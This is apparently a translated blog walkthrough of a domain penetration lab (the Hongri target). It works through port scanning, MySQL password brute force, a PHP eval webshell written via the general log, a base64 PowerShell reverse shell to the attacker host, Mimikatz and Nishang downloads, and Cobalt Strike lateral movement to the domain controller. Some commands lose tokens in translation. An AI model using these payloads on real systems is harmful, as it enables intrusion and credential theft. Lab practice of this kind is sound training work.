Location>code7788 >text

Red Sun Targeting Machine (I) Notes

Popularity:383 ℃/2024-09-08 15:43:03

Red Sun Targeting Machine (I) Notes

summarize

Domain penetration target machine, you can practice some knowledge of the domain penetration, the main thing is to be familiar with powershell syntax, powershell tends to be more powerful than the command line of cmd, and a lot of penetration of open source scripts are powershell. For exampleNiShangPowerView And so on. This is a beginner target machine for domain penetration. There were some problems encountered with it

Target machine address:/vuln/detail/2/

Default password for Red Sun Target: hongrisec@2019

I'm here.

  • web:192.168.81.239
  • win7: 192.168.52.141
  • Domain Control: 192.168.52.138

The kali attacker I'm looking at is 192.168.81.37.

I. nmap scanning

1) Host discovery

sudo nmap -sn 192.168.81.0/24
Nmap scan report for 192.168.81.239
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EC:F8:D6 (VMware)

I see my target machine's ip is192.168.81.239

2) Port scanning

sudo nmap -sT --min-rate 10000 -p- 192.168.81.239
# Nmap 7.93 scan initiated Wed Sep  4 05:56:09 2024 as: nmap -sT --min-rate 10000 -p- -o ports 192.168.81.239
Warning: 192.168.81.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.81.239
Host is up (0.00079s latency).
Not shown: 61205 closed tcp ports (conn-refused), 4319 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1230/tcp open  periscope
3306/tcp open  mysql
MAC Address: 00:0C:29:EC:F8:D6 (VMware)

# Nmap done at Wed Sep  4 05:56:21 2024 -- 1 IP address (1 host up) scanned in 12.44 seconds

Processing of ports

cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','

assign a value to a variable

ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')

3) Detailed information scanning

It's here.$ports Available attab The key displays the value of the variable

sudo nmap -sT -sV -sC -O -p$ports 192.168.81.239 -o details
# Nmap 7.93 scan initiated Wed Sep  4 06:01:26 2024 as: nmap -sT -sC -sV -O -p80,135,139,445,1025,1026,1027,1028,1029,1230,3306 -o details 192.168.81.239
Nmap scan report for 192.168.81.239
Host is up (0.00097s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1029/tcp open  msrpc        Microsoft Windows RPC
1230/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29ecf8d6 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-04T10:02:28
|_  start_date: 2024-09-04T09:46:14
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: 
|   Forest name: 
|   FQDN: 
|_  System time: 2024-09-04T18:02:28+08:00

OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Wed Sep  4 06:02:39 2024 -- 1 IP address (1 host up) scanned in 73.24 seconds

II. Web Penetration

Open WEB page

image-20240904190151295

It's a php probe, scroll down

I see a button to check mysql

image-20240904190355871

Enter whatever you want. Turn on burp.

catch

image-20240904190503862
sudo vi pass_req

Paste in the http raw format.

POST / HTTP/1.1
Host: 192.168.81.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://192.168.81.239
Connection: close
Referer: http://192.168.81.239/
Upgrade-Insecure-Requests: 1

host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=

Change the parameter to be blasted to FUZZ style.login=FUZZ1&password=FUZZ2

1) Password Blasting

Here I use the ffuf utility, -mode can specify the burst mode, -w is also a more conventional username and password for the weak password dictionary

Of course, it's okay to use burp, it's up to you.

sudo ffuf --request pass_req -u http://192.168.81.239 -w /usr/share/SecLists/Usernames/:FUZZ1 -w /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt:FUZZ2 -fs 14807 -mode clusterbomb

Results:


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://192.168.81.239
 :: Wordlist         : FUZZ1: /usr/share/SecLists/Usernames/
 :: Wordlist         : FUZZ2: /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt
 :: Header           : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 :: Header           : Accept-Language: en-US,en;q=0.5
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Header           : Origin: http://192.168.81.239
 :: Header           : Connection: close
 :: Header           : Referer: http://192.168.81.239/
 :: Header           : Host: 192.168.81.239
 :: Header           : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 :: Header           : Accept-Encoding: gzip, deflate
 :: Header           : Upgrade-Insecure-Requests: 1
 :: Data             : host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 14807
________________________________________________

[Status: 200, Size: 14804, Words: 1464, Lines: 401, Duration: 2136ms]
    * FUZZ1: root
    * FUZZ2: root

:: Progress: [3400/3400] :: Job [1/1] :: 19 req/sec :: Duration: [0:02:59] :: Errors: 0 ::

Weak passwords existroot:root

We put it in the voucher.

echo 'root:root' > creds

2) Catalog Blasting

Got the database credentials, and this is a phpstudy site, so let's do a little directory blasting to see if there are any backend pages and such

sudo gobuster dir -u http://192.168.81.239 -w /usr/share/wordlists/dirbuster/directory-list-2.

Here we use gobuster of course many tools can do directory blasting such as: feroxbuster ffuf dirb dirsearch wfuzz and so on have the corresponding functions, but the tools will use different algorithms, when we can not go down a tool, you can try another tool, it is very likely to have the results we want!

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.81.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/%20                  (Status: 403) [Size: 210]
/*checkout*           (Status: 403) [Size: 219]
/phpmyadmin           (Status: 301) [Size: 241] [--> http://192.168.81.239/phpmyadmin/]
/*docroot*            (Status: 403) [Size: 218]
/*                    (Status: 403) [Size: 210]
/con                  (Status: 403) [Size: 212]
/http%3A              (Status: 403) [Size: 214]
/**http%3a            (Status: 403) [Size: 216]
/*http%3A             (Status: 403) [Size: 215]
/aux                  (Status: 403) [Size: 212]
/**http%3A            (Status: 403) [Size: 216]
/%C0                  (Status: 403) [Size: 210]
/%3FRID%3D2671        (Status: 403) [Size: 218]
/devinmoore*          (Status: 403) [Size: 220]
/200109*              (Status: 403) [Size: 216]
/*sa_                 (Status: 403) [Size: 213]
/*dc_                 (Status: 403) [Size: 213]
/%D8                  (Status: 403) [Size: 210]
/%CE                  (Status: 403) [Size: 210]
/%CF                  (Status: 403) [Size: 210]
/%CD                  (Status: 403) [Size: 210]
/%CB                  (Status: 403) [Size: 210]
/%CC                  (Status: 403) [Size: 210]
/%D1                  (Status: 403) [Size: 210]
/%CA                  (Status: 403) [Size: 210]
/%D0                  (Status: 403) [Size: 210]
/%D3                  (Status: 403) [Size: 210]
/%D6                  (Status: 403) [Size: 210]
/%D7                  (Status: 403) [Size: 210]
/%D5                  (Status: 403) [Size: 210]
/%D4                  (Status: 403) [Size: 210]
/%D2                  (Status: 403) [Size: 210]
/%C9                  (Status: 403) [Size: 210]
/%C1                  (Status: 403) [Size: 210]
/%C8                  (Status: 403) [Size: 210]
/%C2                  (Status: 403) [Size: 210]
/%C5                  (Status: 403) [Size: 210]
/%C6                  (Status: 403) [Size: 210]
/%C7                  (Status: 403) [Size: 210]
/%C3                  (Status: 403) [Size: 210]
/%C4                  (Status: 403) [Size: 210]
/%D9                  (Status: 403) [Size: 210]
/%DE                  (Status: 403) [Size: 210]
/%DF                  (Status: 403) [Size: 210]
/%DD                  (Status: 403) [Size: 210]
/%DB                  (Status: 403) [Size: 210]
/phpMyAdmin           (Status: 301) [Size: 241] [--> http://192.168.81.239/phpMyAdmin/]
/login%3f             (Status: 403) [Size: 215]
/%22james%20kim%22    (Status: 403) [Size: 230]
/%22julie%20roehm%22  (Status: 403) [Size: 232]
/%22britney%20spears%22 (Status: 403) [Size: 235]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

there arephpMyAdmin page, let's visit the

image-20240904192705361

Enter the voucher that was just blasted outroot:root You're logged into the backend of the database.

image-20240904193038489

III. Gaining a foothold

phpmyadmin background getshell method

  1. Write directly to the webshell from the web directory using select ... into outfile into webshell (write access required)
  2. Writing to webshell using logs

The first one we execute

SHOW VARIABLES LIKE '%secure%'

see that

image-20240904194641946

secure_file_priv be valued atNULL Disables writing to files. If this value is a directory name, files can be written in the specified directory.
This value is a read-only variable and can only be modified through the configuration file.

The first one doesn't work anymore.

The second type utilizes log files

SHOW VARIABLES LIKE 'general%'
image-20240904195113907

general_log: indicates a switch for the logging function, which can be set with the sql statement

general_log_file: It specifies the absolute path where our logs will be generated.

Logging will be turned on to record all of our sql statements.

 set global general_log=on;# Enable logging

 set global general_log_file='C:/phpStudy/WWW/';# Set log location to web directory

Absolute paths are already available in the php probe at the beginning, let's turn global logging on

image-20240904200423585

fulfillment

select '<?php @eval($_GET["code"]);?>'

interviews

image-20240904200224427

Rebound shell

In the real attack and defense, it is also not recommended to connect directly to the tools such as chopper and ant sword, because their traffic characteristics are too obvious, and a little inattention will cause the alarm of traffic monitoring equipment. Although Godzilla has encrypted the traffic, its * horse format, communication protocol and behavioral characteristics are relatively fixed, if you want to use it, it is still recommended to do the secondary development on the basis of their own, to achieve the bypass of some of the detection equipment.

a) Wrong attempts

On the kali side, install theIf you want to use the smbserver service, turn on the smbserver service and listen to it.

The following command uses python to open a smb shared directory named share in the current folder

python /usr/share/doc/python3-impacket/examples/ share .

listening port

nc -lvp 8888

image-20240904211825105

Command Injection, Access Links

http://192.168.81.239/?code=system('\\\\192.168.81.37\\share\\ -e  192.168.81.37 8888 );

Here smb shows a normal connection. I waited for half a day for it to pop back up, which was a bit annoying, so I cheated and went to look in its window7 and found that

image-20240904212431033

The win7 on this target machine is not compatible with nc ah, I tried both 64 and 32 bit and neither is compatible. But it's a thought to tell you all, so you can be more impressed with the smb service!

b) Direct command injection

google look for sth. :php reverse windows powershell

Read the article:/from-php-s-hell-to-powershell-heaven-da40ce840da8

Getting a more interactive shell with rlwrap

sudo rlwrap nc -lvp 8888

powershell Command to establish a connection

powershell -nop -c "$client = New-Object ('192.168.81.37',8888);$stream = $();[byte[]]$bytes = 0..65535|%{0};while(($i = $($bytes, 0, $)) -ne 0){;$data = (New-Object -TypeName ).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([]::ASCII).GetBytes($sendback2);$($sendbyte,0,$);$()};$()"

base64 encoding

cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxOTIuMTY4LjgxLjM3Jyw4ODg4KTskc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKTtbYnl0ZVtdXSRieXRlcyA9IDAuLjY1NTM1fCV7MH07d2hpbGUoKCRpID0gJHN0cmVhbS5SZWFkKCRieXRlcywgMCwgJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSAkc2VuZGJhY2sgKyAnUFMgJyArIChwd2QpLlBhdGggKyAnPiAnOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgpIg==

Because of the special characters in the command, I tried typing it directly or url encoding it, and it didn't bounce unsuccessfully, so I encoded it in base64 and decoded it with the base64_decode() method of the php function, to avoid any interference from the special characters.

access link

http://192.168.81.239/?code=system(base64_decode("cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxOTIuMTY4LjgxLjM3Jyw4ODg4KTskc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKTtbYnl0ZVtdXSRieXRlcyA9IDAuLjY1NTM1fCV7MH07d2hpbGUoKCRpID0gJHN0cmVhbS5SZWFkKCRieXRlcywgMCwgJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSAkc2VuZGJhY2sgKyAnUFMgJyArIChwd2QpLlBhdGggKyAnPiAnOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgpIg==")); 

Successful shell bounce

image-20240905085444553

I got lucky and bounced right back to the user with system privileges, so I don't have to lift the privileges.

Get the shell, change the encoding format first

chcp 65001

IV. Domain information collection

Viewing the NIC
ipconfig /all
image-20240905091531456image-20240905091609880

spot192.168.52.0 The NIC of the network segment should be the corresponding intranet NIC of the domain, the hostname of the local machine and the information of the domain can also be seen

System Information
systeminfo
image-20240905091928827

Seeing that the domian field is represents that this is the machine in the domain.

The default field for regular machines is:WORKGROUP

You can also see some information about the machine that has been patched, as well as the network card information

routing information
route pirnt
image-20240905091322341
Additional Hosting Information
net view
image-20240905092230684
View Domain Administrators
image-20240905092951993

V. Domain penetration

We know from our information gathering that the domain control hosts areowaThe domain name is

View domain control host ip

ping 
image-20240905094056717

I see that the domain control ip is192.168.52.138

Password Grabbing with mimikatz

1) Upload Invoke-mimikatz.ps1

Invoke-mimikatz.ps1 connection:/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

Enabling the http service

php -S 0:80

Viewing powershell version information for a machine

$

Because there is a slight difference in the commands before and after powershell 3.0

image-20240905102653425

The powershell on the target machine is version 2.0 and theInvoke-WebRequest The cmdlet was introduced with PowerShell 3.0.

We use the .NET class to realize the download function

powershell -command "& {(New-Object ).DownloadFile('http://192.168.81.37/Invoke-Mimikatz.ps1','c:\program files\Invoke-Mimikatz.ps1')}"
image-20240905140642822

See the successful upload at the http service

Uploaded.c:\program files directory

cd c:\'program files'
dir
image-20240905140800334

I see it uploaded successfully.

Of course, mimikatz also needs to be free of antivirus, otherwise its operation will trigger the antivirus program as well.

2) Run mimikatz

Running Invoke-Mimikatz.ps1 in powershell First we need to disable the execution policy

Get-ExecutionPolicy

Restricted: No scripts are allowed to run.

AllSigned: Only run scripts signed by trusted publishers.

RemoteSigned: Locally created scripts can be run, remotely downloaded scripts must be signed.

Unrestricted: All scripts are allowed to run, but there is a warning when running scripts downloaded from the Internet.

We set it toRemoteSigned can immediately (do sth)

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

image-20240905142321237

Of course, you can also use theBypass This parameter performs a single-command bypass

import (data)

Import-moudle .\Invoke-Mimikatz.ps1

(of cargo etc) load

.\Invoke-Mimikatz.ps1

fulfillment

Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"

It's not responding.

Theoretically, it should be able to grab passwords properly, and I've had a lot of problems with this target machine I've been hitting.

Attempts to solve problems (failed)

I wonder if it's because powershell is not very stable when executing code in php.

Would the bounce back be more stable if we used nishang's tcp script? Try usingnishang rebound (of stock market etc)

sudo apt install nishang

Enter the command nishang to see the directory

nishang
cd Shells

see thatInvoke-PowerShellTcp.ps1 file

sudo vi Invoke-PowerShellTcp.ps1

At the bottom of its file, add the bounce shell statement

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.81.37 -Port 4444
image-20240905183220791

It's just waiting for him to load into memory to execute the logic of the bounce shell.

kali listener with http service enabled

nc -lvp 4444

php -S 0:80

At the command line, execute

powershell -command "& {(new-object ).downloadfile('http://192.168.81.37/Invoke-PowerShellTcp.ps1','c:\Invoke-PowerShellTcp.ps1')}" ; c:\Invoke-PowerShellTcp.ps1
image-20240905191100176

Downloaded successfully, received the bounce shell, but it's the same shell as before, still can't run mimikatz.ps1

3) Replacement of ideas (using cobalstrike)

Start cs

./teamserver localhost 123456
./cobalstrike

Generate * horse and upload

powershell -ExecutionPolicy Bypass -command "& {(New-Object ).DownloadFile('http://192.168.81.37/', 'C:\Users\Public\')}"

image-20240908140727778

activate (a plan)

 /c ".\" 

image-20240908141454607

Successful launch

image-20240908141543698

port scanning

image-20240908141817252

image-20240908141906193

see that

image-20240908142258719

image-20240908142321629

Run mimikatz

image-20240908142720247

image-20240908142808061

See domain controlowa passwordshongrisec@2022

VI. Access to domain control

Already have the password for the domain administrator Getting domain control is easy!

Create SMB listener on cs

image-20240908143836586

Direct jump

image-20240908143908306

Saw domain control go live.

image-20240908144157561

I've got the domain control. I'll take this domain wherever I want.

Jump to host 141.

image-20240908144330710

image-20240908144527049

Successfully took down three units

image-20240908145009742

summarize

  1. The nmap scan shows that the target web server has ports 80, 135, and 3306 open, and through directory blasting on port 80 and weak password fuzzing, the backend of phpmyadmin was found and successfully logged in.
  2. Using the log output from the database, a one-sentence * was written to successfully bounce the command line of powershell. Because of the flaws in the command line of powershell 2.0, I encountered a situation where mimikatz could not be used during the domain penetration information collection, and tried to solve it but failed.
  3. Finally, the cobalstrike integration tool was used to complete the lateral move to the domain control and successfully gain domain control administrator privileges.